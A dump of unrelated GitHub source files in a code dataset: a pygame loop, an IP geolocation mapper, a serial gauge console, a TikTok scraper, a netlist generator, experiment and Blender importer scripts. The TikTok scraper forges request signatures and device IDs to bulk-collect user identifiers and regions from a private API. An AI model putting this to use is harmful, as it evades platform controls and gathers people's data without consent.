False\npygame.display.flip()\ncanvas = Canvas()\n\nwhile(True):\n isClick = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == 1:\n isClick = True\n elif event.type == KEYDOWN:\n if event.unicode.isalpha():\n letter = event.unicode\n letter = canvas.update(isClick, letter)\n","repo_name":"esopsis/Ericbic","sub_path":"eribic.py","file_name":"eribic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31665849587","text":"import sqlite3\nimport re\nimport pandas as pd\nimport plotly.express as px\nimport requests\n\ndef main():\n # mapCountryData()\n # Should create mkdir method\n ipList = retrieveAllIpAddress()\n\n if (len(ipList) > 0): \n ipHashMap = mapIpToCoordinates(ipList)\n updateDatabaseWithCoordinates(ipHashMap)\n else:\n print(\"no ip addresses needed to retrieve coordinates\")\n \n mapCountryDataWithDb()\n groupDataByMonths()\n\ndef retrieveAllIpAddress():\n print(\"retrieving ip addresses from table\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n select_all_ips_query = \"SELECT ip_address FROM tool_download_count WHERE coord_updated IS FALSE\"\n ipList_raw = cursor.execute(select_all_ips_query)\n\n ipList = [i[0] for i in ipList_raw]\n\n return ipList\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef requestIpApi(listofIp, ipToMetaMap):\n url = 'http://ip-api.com/batch'\n\n response = requests.post(url, json=listofIp)\n if response: \n responseJson = response.json()\n if responseJson:\n for obj in responseJson:\n ip = obj['query']\n ipToMetaMap[ip] = obj\n else:\n print('status raise', response.raise_for_status())\n else: \n print('status code', response.status_code)\n\n return ipToMetaMap\n\n# 100 IP address MAX\nMAX_API_BATCH_SIZE = 50\n\ndef mapIpToCoordinates(listofIp):\n print(\"batch conversion of Ip address by 100\")\n \n ipToMetaMap = {}\n for batch in chunks(listofIp, MAX_API_BATCH_SIZE):\n batch_done = requestIpApi(batch, ipToMetaMap)\n ipToMetaMap.update(batch_done)\n\n return ipToMetaMap\n\n\ndef updateDatabaseWithCoordinates(ipMap):\n print(\"update table with lat / lon coordinates\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n for key in ipMap:\n ipx = key\n lat = \"\"\n lon = \"\"\n country = \"\"\n regionName = \"\"\n city = \"\"\n zip = \"\"\n\n if ipMap[key]['status'] == \"success\":\n lat = ipMap[ipx]['lat']\n lon = ipMap[ipx]['lon']\n country = ipMap[ipx]['country']\n regionName = ipMap[ipx]['regionName']\n city = ipMap[ipx]['city']\n zip = ipMap[ipx]['zip']\n\n cursor.execute(\n '''UPDATE tool_download_count SET ip_lat=?, ip_long=?, country=?, region=?, city=?, zip=?, coord_updated=? \\\n WHERE ip_address=? AND coord_updated IS FALSE''', (lat, lon, country, regionName, city, zip, 1, ipx))\n\n dbconn.commit()\n\ndef mapCountryDataWithDb():\n # Testing panda scatter geo plot with select db import\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n fig = px.scatter_geo(df, lat='ip_lat',\n lon='ip_long', hover_name=\"city\",\n width=800, height=400)\n\n fig.update_layout(plot_bgcolor=\"rgba(0, 0, 0, 0)\", paper_bgcolor=\"rgba(0, 0, 0, 0)\", margin=dict(l=0, r=0, t=0, b=0))\n\n fig.show()\n\n # Using kaleido - export in PNG\n fig.write_image(\"map/images/output.png\")\n\n # Export in HTML\n fig.write_html(\"map/html/output.html\")\n\ndef groupDataByMonths():\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n df['Year'] = pd.to_datetime(df['date_download']).dt.year\n df['Month'] = pd.to_datetime(df['date_download']).dt.month\n\n g = df.groupby([('Year'), ('Month')]).sum().to_json(r\"map/json/map_months.json\")\n # print(g)\n\ndef mapCountryData():\n # Testing panda scatter geo plot with csv import\n\n df = pd.read_csv(\"csv/countries.csv\")\n\n fig = px.scatter_geo(df, lat='latitude',\n lon='longitude', hover_name=\"name\")\n fig.update_layout(title='World map', title_x=0.5)\n fig.show()\n\n\n# Call main\nif __name__ == \"__main__\":\n main()\n","repo_name":"jessewoo/githubStats","sub_path":"map/mapDb.py","file_name":"mapDb.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30942129302","text":"#!/usr/bin/python3\n\n\"\"\"\ninitialize Isotemp water bath, then provide user with an interactive console for debugging\n\"\"\"\n\nimport convectron475 as convectron\nimport traceback\n\ngauge = convectron.ConvectronController(port=\"/dev/cu.usbserial-ftE17ZWN\")\n\nwhile True:\n\tcmd = input(\"gauge.\")\n\ttry:\n\t\tret = eval(\"gauge.{}\".format(cmd))\n\t\tprint(ret)\n\texcept:\n\t\ttraceback.print_exc()\n\t\tgauge.disconnect()","repo_name":"octopode/pyvectron","sub_path":"convectrontest.py","file_name":"convectrontest.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70058091300","text":"import time\nimport string\nimport requests\nimport itertools\n\nfrom urllib.parse import urlencode\nfrom utils.signer import *\n\nclass Verifinder:\n def __init__(self, proxy: str or None = None, count: int = 4) -> None:\n self.proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'} if proxy else None\n self.accounts = []\n self.keywords = get_keywords(count)\n\n def __base_params(self, keyword: str, cursor: int = 0) -> str:\n return urlencode({\n \"count\" : 30,\n \"cursor\" : cursor,\n \"keyword\" : keyword,\n \"search_source\" : \"report_user\",\n \"type\" : 1,\n \"request_tag_from\" : \"h5\",\n \"storage_type\" : 0,\n \"iid\" : 7137816409338136325,\n \"channel\" : \"googleplay\",\n \"device_type\" : \"SM-G973N\",\n \"device_id\" : 6990239216324986369,\n \"os_version\" : 9,\n \"version_code\" : 160904,\n \"app_name\" : \"musically_go\",\n \"device_brand\" : \"samsung\",\n \"device_platform\" : \"android\",\n \"aid\" : 1340,\n })\n \n def __base_headers(self, params: str) -> dict:\n sig = XGorgon(\n params = params\n ).get_value()\n \n return {\n \"accept-encoding\" : \"gzip\",\n \"sdk-version\" : \"2\",\n \"x-ss-req-ticket\" : str(int(time.time() * 1000)),\n \"x-khronos\" : sig[\"X-Khronos\"],\n \"x-gorgon\" : sig[\"X-Gorgon\"],\n \"host\" : \"api16-normal-c-useast1a.tiktokv.com\",\n \"connection\" : \"Keep-Alive\",\n \"user-agent\" : \"okhttp/3.10.0.1\"\n }\n \n def __scrape_veris(self, keyword: str, cursor: int = 0) -> requests.Response:\n __base_params = self.__base_params(keyword, cursor)\n \n return requests.get(\n url = (\n \"https://api16-normal-c-useast1a.tiktokv.com\"\n + \"/aweme/v1/discover/search/?\"\n + __base_params \n ),\n headers = self.__base_headers(__base_params)\n )\n \n def main(self):\n cursor = 0\n for keyword in self.keywords:\n while True:\n try:\n __scrape_req = self.__scrape_veris(keyword, cursor)\n # print(__scrape_req.text)\n for _ in __scrape_req.json()[\"user_list\"]:\n if _[\"user_info\"][\"unique_id\"] not in self.accounts:\n \n self.accounts.append(_[\"user_info\"][\"unique_id\"])\n info_string = f'{_[\"user_info\"][\"unique_id\"]}:{_[\"user_info\"][\"follower_count\"]}:{_[\"user_info\"][\"uid\"]}:{_[\"user_info\"][\"sec_uid\"]}:{_[\"user_info\"][\"region\"]}'\n \n print(info_string)\n \n with open(\"utils/veris.txt\") as file:\n file.write(info_string + \"\\n\")\n \n if len(__scrape_req.json()[\"user_list\"]) == 0:\n cursor = 0\n break\n \n cursor += 30 if cursor < 30 else 31\n \n except Exception:\n cursor = 0\n break\n \nif __name__ == \"__main__\":\n Verifinder().main()","repo_name":"xtekky/TikTok-Verified-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"} +{"seq_id":"23279257994","text":"from functools import cmp_to_key\nfrom itertools import chain\nfrom typing import *\n\nimport edgir\nfrom edg_core import *\nfrom . import footprint as kicad\n\n\nclass InvalidNetlistBlockException(BaseException):\n pass\n\n\nclass InvalidPackingException(BaseException):\n pass\n\n\nclass Netlist(NamedTuple): # TODO use TransformUtil.Path across the board\n blocks: Dict[str, kicad.Block] # block name: footprint name\n nets: Dict[str, List[kicad.Pin]] # net name: list of member pins\n\n\nBlocks = Dict[TransformUtil.Path, kicad.Block] # path -> Block\nEdges = Dict[TransformUtil.Path, List[TransformUtil.Path]] # Pins (block name, port / pin name) -> net-connected Pins\nAssertConnected = List[Tuple[TransformUtil.Path, TransformUtil.Path]]\nNames = Dict[TransformUtil.Path, TransformUtil.Path] # Path -> shortened path name\nClassPaths = Dict[TransformUtil.Path, List[str]] # Path -> class names corresponding to shortened path name\nclass NetlistTransform(TransformUtil.Transform):\n @staticmethod\n def path_to_pin(path: TransformUtil.Path) -> kicad.Pin:\n assert not path.links and not path.params\n return kicad.Pin('.'.join(path.blocks), '.'.join(path.ports))\n\n @staticmethod\n def flatten_port(path: TransformUtil.Path, port: edgir.PortLike) -> Iterable[TransformUtil.Path]:\n if port.HasField('port'):\n return [path]\n elif port.HasField('array') and port.array.HasField('ports'):\n return chain(*[NetlistTransform.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in port.array.ports.ports])\n else:\n raise ValueError(f\"don't know how to flatten netlistable port {port}\")\n\n def __init__(self, design: CompiledDesign, refdes_mode: str = \"pathName\"):\n self.blocks: Blocks = {}\n self.edges: Edges = {}\n self.assert_connected: AssertConnected = []\n self.short_paths: Names = {TransformUtil.Path.empty(): TransformUtil.Path.empty()} # seed root\n self.class_paths: ClassPaths = {TransformUtil.Path.empty(): []} # seed root\n self.pins: Set[TransformUtil.Path] = set()\n self.names: Names = {}\n\n self.design = design\n self.refdes_mode = refdes_mode\n\n def process_blocklike(self, path: TransformUtil.Path, block: Union[edgir.Link, edgir.LinkArray, edgir.HierarchyBlock]) -> None:\n # generate short paths for children first\n short_path = self.short_paths[path]\n class_path = self.class_paths[path]\n\n # TODO handle mixed net/connect operations\n if isinstance(block, edgir.Link) and 'nets' in block.meta.members.node:\n # Consolidate single-net link ports into just the link\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path\n\n else:\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n for link_pair in block.links:\n self.short_paths[path.append_link(link_pair.name)] = short_path.append_link(link_pair.name)\n self.class_paths[path.append_link(link_pair.name)] = class_path + [link_pair.value.link.self_class.target.name]\n\n main_internal_blocks: Dict[str, edgir.BlockLike] = {}\n other_internal_blocks: Dict[str, edgir.BlockLike] = {}\n if isinstance(block, edgir.HierarchyBlock):\n for block_pair in block.blocks:\n subblock = block_pair.value\n # ignore pseudoblocks like bridges and adapters that have no internals\n if not subblock.hierarchy.blocks and 'fp_is_footprint' not in subblock.hierarchy.meta.members.node:\n other_internal_blocks[block_pair.name] = block_pair.value\n else:\n main_internal_blocks[block_pair.name] = block_pair.value\n\n if len(main_internal_blocks) == 1:\n name = list(main_internal_blocks.keys())[0]\n self.short_paths[path.append_block(name)] = short_path\n self.class_paths[path.append_block(name)] = class_path\n else:\n for (name, subblock) in main_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n for (name, subblock) in other_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n if 'nets' in block.meta.members.node:\n # add all-pairs edges\n # list conversion to deal with iterable-once\n flat_ports = list(chain(*[self.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in block.ports]))\n for src_path in flat_ports:\n for dst_path in flat_ports:\n if src_path != dst_path:\n self.edges.setdefault(src_path, []).append(dst_path)\n\n if 'nets_packed' in block.meta.members.node:\n # this connects the first source to all destinations, then asserts all the sources are equal\n # this leaves the sources unconnected, to be connected externally and checked at the end\n src_port_name = block.meta.members.node['nets_packed'].members.node['src'].text_leaf\n dst_port_name = block.meta.members.node['nets_packed'].members.node['dst'].text_leaf\n flat_srcs = list(self.flatten_port(path.append_port(src_port_name), edgir.pair_get(block.ports, src_port_name)))\n flat_dsts = list(self.flatten_port(path.append_port(dst_port_name), edgir.pair_get(block.ports, dst_port_name)))\n assert flat_srcs, \"missing source port(s) for packed net\"\n for dst_path in flat_dsts:\n self.edges.setdefault(flat_srcs[0], []).append(dst_path)\n self.edges.setdefault(dst_path, []).append(flat_srcs[0])\n for src_path in flat_srcs: # assert all sources connected\n for dst_path in flat_srcs:\n self.assert_connected.append((src_path, dst_path))\n\n if 'fp_is_footprint' in block.meta.members.node:\n footprint_name = self.design.get_value(path.to_tuple() + ('fp_footprint',))\n footprint_pinning = self.design.get_value(path.to_tuple() + ('fp_pinning',))\n mfr = self.design.get_value(path.to_tuple() + ('fp_mfr',))\n part = self.design.get_value(path.to_tuple() + ('fp_part',))\n value = self.design.get_value(path.to_tuple() + ('fp_value',))\n refdes = self.design.get_value(path.to_tuple() + ('fp_refdes',))\n lcsc_part = self.design.get_value(path.to_tuple() + ('lcsc_part',))\n\n assert isinstance(footprint_name, str)\n assert isinstance(footprint_pinning, list)\n assert isinstance(mfr, str) or mfr is None\n assert isinstance(part, str) or part is None\n assert isinstance(value, str) or value is None\n assert isinstance(lcsc_part, str) or lcsc_part is None\n assert isinstance(refdes, str)\n\n part_comps = [\n part,\n f\"({mfr})\" if mfr else \"\"\n ]\n part_str = \" \".join(filter(None, part_comps))\n value_comps = [\n part_str,\n value\n ]\n value_str = \" - \".join(filter(None, value_comps))\n\n self.blocks[path] = kicad.Block(\n footprint_name,\n refdes,\n part_str,\n\n # Uncomment one to set value field\n # TODO this should be a user flag\n value_str, # including manufacturer\n # lcsc_part or \"\",\n\n list(path.blocks),\n list(self.short_paths[path].blocks),\n self.class_paths[path],\n )\n\n if self.refdes_mode == \"pathName\":\n self.names[path] = self.short_paths[path]\n elif self.refdes_mode == \"refdes\":\n self.names[path] = TransformUtil.Path.empty().append_block(refdes)\n else:\n raise ValueError(f\"Invalid valueMode value {self.refdes_mode}\")\n\n for pin_spec in footprint_pinning:\n assert isinstance(pin_spec, str)\n pin_spec_split = pin_spec.split('=')\n assert len(pin_spec_split) == 2\n pin_name = pin_spec_split[0]\n port_path = edgir.LocalPathList(pin_spec_split[1].split('.'))\n\n pin_path = path.append_port(pin_name)\n self.pins.add(pin_path)\n self.short_paths[pin_path] = short_path.append_port(pin_name)\n\n src_path = path.follow(port_path, block)[0]\n\n # Create a unidirectional edge from the port to the footprint pin\n self.edges.setdefault(src_path, []).append(pin_path)\n self.edges.setdefault(pin_path, []) # create a dummy entry\n\n self.names[pin_path] = self.names[path].append_port(pin_name)\n\n for constraint_pair in block.constraints:\n if constraint_pair.value.HasField('connected'):\n self.process_connected(path, block, constraint_pair.value.connected)\n elif constraint_pair.value.HasField('exported'):\n self.process_exported(path, block, constraint_pair.value.exported)\n elif constraint_pair.value.HasField('exportedTunnel'):\n self.process_exported(path, block, constraint_pair.value.exportedTunnel)\n elif constraint_pair.value.HasField('connectedArray'):\n for expanded_connect in constraint_pair.value.connectedArray.expanded:\n self.process_connected(path, block, expanded_connect)\n elif constraint_pair.value.HasField('exportedArray'):\n for expanded_export in constraint_pair.value.exportedArray.expanded:\n self.process_exported(path, block, expanded_export)\n\n def process_connected(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ConnectedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_connected(path, current, constraint.expanded[0])\n return\n assert constraint.block_port.HasField('ref')\n assert constraint.link_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.block_port.ref, current),\n path.follow(constraint.link_port.ref, current))\n\n def process_exported(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ExportedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_exported(path, current, constraint.expanded[0])\n return\n assert constraint.internal_block_port.HasField('ref')\n assert constraint.exterior_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.internal_block_port.ref, current),\n path.follow(constraint.exterior_port.ref, current))\n\n def connect_ports(self, elt1: Tuple[TransformUtil.Path, edgir.EltTypes], elt2: Tuple[TransformUtil.Path, edgir.EltTypes]) -> None:\n \"\"\"Recursively connect ports as applicable\"\"\"\n if isinstance(elt1[1], edgir.Port) and isinstance(elt2[1], edgir.Port):\n self.edges.setdefault(elt1[0], []).append(elt2[0])\n self.edges.setdefault(elt2[0], []).append(elt1[0])\n elif isinstance(elt1[1], edgir.Bundle) and isinstance(elt2[1], edgir.Bundle):\n elt1_names = list(map(lambda pair: pair.name, elt1[1].ports))\n elt2_names = list(map(lambda pair: pair.name, elt2[1].ports))\n assert elt1_names == elt2_names, f\"mismatched bundle types {elt1}, {elt2}\"\n for key in elt2_names:\n self.connect_ports(\n (elt1[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt1[1].ports, key))),\n (elt2[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt2[1].ports, key))))\n # don't need to create the bundle connect, since Bundles can't be CircuitPorts\n else:\n raise ValueError(f\"can't connect types {elt1}, {elt2}\")\n\n def visit_portlike(self, context: TransformUtil.TransformContext, port: edgir.PortLike) -> None:\n self.pins.add(context.path)\n\n short_path = self.short_paths[context.path]\n if port.HasField('bundle'): # TODO maybe shorten if just one?\n for port_pair in port.bundle.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n elif port.HasField('array') and port.array.HasField('ports'):\n for port_pair in port.array.ports.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n def visit_block(self, context: TransformUtil.TransformContext, block: edgir.BlockTypes) -> None:\n self.process_blocklike(context.path, block)\n\n def visit_link(self, context: TransformUtil.TransformContext, link: edgir.Link) -> None:\n self.process_blocklike(context.path, link)\n\n def visit_linkarray(self, context: TransformUtil.TransformContext, link: edgir.LinkArray) -> None:\n self.process_blocklike(context.path, link)\n\n @staticmethod\n def name_net(net: Iterable[TransformUtil.Path], net_prefix: str) -> str:\n \"\"\"Names a net based on all the paths of ports and links that are part of the net.\"\"\"\n def pin_name_goodness(pin1: TransformUtil.Path, pin2: TransformUtil.Path) -> int:\n assert not pin1.params and not pin2.params\n # TODO rewrite rules to based on _anon internal depth, though elt[0] is likely where the _anon will be\n # First disprefer anon or auto-generated names\n if pin1.links and (pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (not pin2.links or pin2.links[0].startswith('anon') or pin2.links[0].startswith('_')):\n return 1\n elif (not pin1.links or pin1.links[0].startswith('anon') or pin1.links[0].startswith('_')) and \\\n (pin2.links and (pin2.links[0].startswith('anon') or pin2.links[0].startswith('_'))):\n return -1\n elif len(pin1.blocks) != len(pin2.blocks): # prefer shorter block paths\n return len(pin1.blocks) - len(pin2.blocks)\n elif len(pin1.ports) == 1 and pin1.ports[0].isnumeric() and \\\n (len(pin2.ports) != 1 or (pin2.ports and not pin2.ports[-1].isnumeric())): # disprefer number-only ports\n return 1\n elif len(pin2.ports) == 1 and pin2.ports[0].isnumeric() and \\\n (len(pin1.ports) != 1 or (pin1.ports and not pin1.ports[-1].isnumeric())): # disprefer number-only ports\n return -1\n elif len(pin1.ports) != len(pin2.ports): # prefer shorter port lengths\n return len(pin1.ports) - len(pin2.ports)\n elif pin1.ports and not pin2.ports: # prefer ports\n return -1\n elif not pin1.ports and pin2.ports:\n return 1\n elif pin1.links and not pin2.links: # prefer links\n return -1\n elif not pin1.links and pin2.links:\n return 1\n else: # prefer shorter pin paths\n return len(pin1.ports) - len(pin2.ports)\n best_path = sorted(net, key=cmp_to_key(pin_name_goodness))[0]\n\n return net_prefix + str(best_path)\n\n def run(self) -> Netlist:\n self.transform_design(self.design.design)\n\n # Sanity check to ensure all pins exist\n for pin_src, pins_dst in self.edges.items():\n assert pin_src in self.pins, f\"missing net edge src pin {pin_src}\"\n for pin_dst in pins_dst:\n assert pin_dst in self.pins, f\"missing net edge dst pin {pin_dst}\"\n\n # Convert to the netlist format\n seen: Set[TransformUtil.Path] = set()\n nets: List[List[TransformUtil.Path]] = [] # use lists instead of sets to preserve ordering\n\n for port, conns in self.edges.items():\n if port not in seen:\n curr_net: List[TransformUtil.Path] = []\n frontier: List[TransformUtil.Path] = [port] # use BFS to maintain ordering instead of simpler DFS\n while frontier:\n pin = frontier.pop(0)\n if pin not in seen:\n seen.add(pin)\n curr_net.append(pin)\n frontier.extend(self.edges[pin])\n nets.append(curr_net)\n\n pin_to_net: Dict[TransformUtil.Path, List[TransformUtil.Path]] = {} # values share reference to nets\n for net in nets:\n for pin in net:\n pin_to_net[pin] = net\n\n for (connected1, connected2) in self.assert_connected:\n if pin_to_net[connected1] is not pin_to_net[connected2]:\n raise InvalidPackingException(f\"packed pins {connected1}, {connected2} not connected\")\n\n def name_pin(pin: TransformUtil.Path) -> TransformUtil.Path:\n if pin in self.short_paths:\n return self.short_paths[pin]\n else:\n return pin\n\n board_refdes_prefix = self.design.get_value(('refdes_prefix',))\n if board_refdes_prefix is not None:\n assert isinstance(board_refdes_prefix, str)\n net_prefix = board_refdes_prefix\n else:\n net_prefix = ''\n named_nets = {self.name_net([name_pin(pin) for pin in net], net_prefix): net\n for net in nets}\n\n netlist_blocks = {str(self.names[block_path]): block\n for block_path, block in self.blocks.items()}\n netlist_nets = {name: [self.path_to_pin(self.names[pin])\n for pin in net if pin in self.names]\n for name, net in named_nets.items()}\n\n return Netlist(netlist_blocks, netlist_nets)\n","repo_name":"BerkeleyHCI/PolymorphicBlocks","sub_path":"electronics_model/NetlistGenerator.py","file_name":"NetlistGenerator.py","file_ext":"py","file_size_in_byte":16765,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"} +{"seq_id":"37755447265","text":"import tensorflow as tf\nimport subprocess\nimport sys\nimport itertools\nimport json\nimport random\n\n# Parameters for loss types\nmean_over_batch = {\"True\", \"False\"}\nlinearity = {\"True\", \"False\"}\nloss_type = {\"dist\", \"ratio\"}\nloss_form = {\"log\", \"minus\", \"inverse\" }\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n\n# Params for Architecture\nlosses= [['True', 'ratio', 'minus'], ['False', 'dist', 'log'], ['True', 'dist', 'log'], ['False', 'ratio', 'minus']]\nnumber_of_layers = [3, 4]\nkernel_size = [7, 5, 3]\nchannels = [1, 2, 3]\n\n#Try later\n#dilation = [1,2]\n#dropout = [0.8,1]\n\n\nargnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\", \"kernel_shape\", \"dialation_rate\"]\n\n#archs_perm = [losses, number_of_layers, kernel_type, channels]\n\n\ndef main(unusedargs):\n linearity_experiment()\n\n\ndef loss_experiment():\n print('Running..')\n loss_perm = [mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"loss=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n\ndef linearity_experiment():\n print('running')\n loss_perm = [linearity, mean_over_batch, loss_type, loss_form]\n params = list(itertools.product(*loss_perm))\n argnames= [\"linear\", \"mean_over_batch\", \"loss_type\", \"loss_form\"]\n\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"lin=\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[i])\n name += '_'+param[i]\n i = i + 1\n print(param[0])\n\n\n kernel = construct_kernel(random.choice(number_of_layers))\n if param[0]=='True':\n kernel = [[32,32,1,1]]\n\n script.append(\"--kernel_shape=\"+json.dumps(kernel).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=1000\")\n script = ' '.join(script)\n print(script)\n subprocess.call(script, shell=True)\n\n# Experiment for architectures\ndef architecture_experiment():\n kernel_shapes = []\n for i in range (40):\n kernel_shapes.append(construct_kernel(random.choice(number_of_layers)))\n\n archs_perm = [losses, kernel_shapes]\n params = list(itertools.product(*archs_perm))\n argnames= [\"mean_over_batch\", \"loss_type\", \"loss_form\"]\n #print(len(params))\n for param in params:\n script = [\"python train.py\"]\n i = 0\n name = \"arch_l\" + str(len(param[1]))+\"=[\"\n for row in param[1]:\n name += str(row[0])+\",\"+str(row[3])+\"-\"\n name +=\"]\"\n for argname in argnames:\n script.append(\"--\"+argname+\"=\"+param[0][i])\n name += '_'+param[0][i]\n i = i + 1\n\n script.append(\"--kernel_shape=\"+json.dumps(param[1]).replace(\" \", \"\"))\n script.append(\"--exp_name=\"+str(name))\n script.append(\"--steps=400\")\n script = ' '.join(script)\n #print(name)\n subprocess.call(script, shell=True)\n\n\n\ndef construct_kernel(num_layer):\n\n def calc_channel(k_size, coef):\n return 25*coef/(k_size)\n\n k_size = random.choice(kernel_size)\n if num_layer == 1:\n return [[k_size, k_size, 1, 1]]\n\n k_last_size = random.choice(kernel_size)\n coef = random.choice(channels)\n channel = calc_channel(k_last_size, coef)\n kernel_shape = [[k_size, k_size, 1, channel]]\n\n if num_layer == 2:\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n if num_layer>2:\n for i in range(num_layer-2):\n old_channel = channel\n coef = random.choice(channels)\n k_size = random.choice(kernel_size)\n channel = calc_channel(k_size, coef)\n\n new_layer = [k_size, k_size, old_channel, channel]\n kernel_shape.append(new_layer)\n\n new_layer = [k_last_size, k_last_size, channel, 1]\n kernel_shape.append(new_layer)\n return kernel_shape\n\n\nif __name__ == '__main__':\n tf.app.run(main=main, argv=[sys.argv[0]])\n","repo_name":"seung-lab/FilterFinder","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22844441013","text":"\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Menu, Operator, Panel, UIList, AddonPreferences\nfrom bpy.app.handlers import persistent\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport requests\n\nclass ARImporterAddonPreferences(AddonPreferences):\n\n bl_idname = basename(dirname(__file__)) # directory name containing this file\n\n ip_address = StringProperty(\n name=\"IP Address\",\n )\n\n ar_root = StringProperty(\n name=\"Storage root\",\n subtype='FILE_PATH',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"ip_address\")\n layout.prop(self, \"ar_root\")\n\n# -------------------------------------------------------------------------------\n# UI PANEL - Extra Image List\n# -------------------------------------------------------------------------------\nclass ARImporter_PT_ImagePreview(Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_category = \"AR Importer\"\n bl_label = \"Import\"\n\n def draw(self, context):\n layout = self.layout\n row = layout.row()\n row.operator(\"arimporter.latest\", text=\"Import Latest\")\n\n\nclass ARImportLatest(Operator):\n bl_idname = \"arimporter.latest\"\n bl_label = \"Latest\"\n bl_description = \"AR Import Latest\"\n\n def execute(self, context):\n user_preferences = context.user_preferences\n addon_prefs = user_preferences.addons[basename(dirname(__file__))].preferences\n root_url = \"http://%s/\" % addon_prefs.ip_address\n\n print(\"Importing latest \" + addon_prefs.ip_address)\n resp = requests.get(root_url + \"shots\").json()\n latest = resp[0]\n print(latest)\n local_shot_dir = join(addon_prefs.ar_root, latest[\"uuid\"])\n\n file_types = [\"_pointcloud_z.ply\", \".mov\", \"_scene.fbx\"]\n try:\n # Create target Directory\n os.mkdir(local_shot_dir)\n except FileExistsError:\n print(\"Directory \", local_shot_dir, \" already exists\")\n\n local_files = []\n for file_type in file_types:\n remote_url = root_url + \"content/shots/%s/shot-%s%s\" % (latest[\"uuid\"], latest[\"uuid\"], file_type)\n file_basename = basename(remote_url)\n local_file = join(local_shot_dir, file_basename)\n local_files.append(local_file)\n r = requests.get(remote_url, allow_redirects=True)\n open(local_file, 'wb').write(r.content)\n\n for local_file in local_files:\n if local_file.endswith(\".fbx\"):\n bpy.ops.import_scene.fbx(filepath=local_file, anim_offset=0, bake_space_transform=True)\n if local_file.endswith(\".ply\"):\n bpy.ops.import_mesh.ply(filepath=local_file)\n if local_file.endswith(\".mov\"):\n clip = bpy.data.movieclips.load(local_file)\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n space_data = area.spaces.active\n space_data.show_background_images = True\n bg = space_data.background_images.new()\n bg.clip = clip\n bg.source = 'MOVIE_CLIP'\n bg.use_camera_clip = False\n bg.opacity = 1\n break\n\n return {'FINISHED'}\n\n\n","repo_name":"FreakTheMighty/BlenderARImporter","sub_path":"ar_importer_utils.py","file_name":"ar_importer_utils.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13727799760","text":"\"\"\"GET endpoints for users.\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import 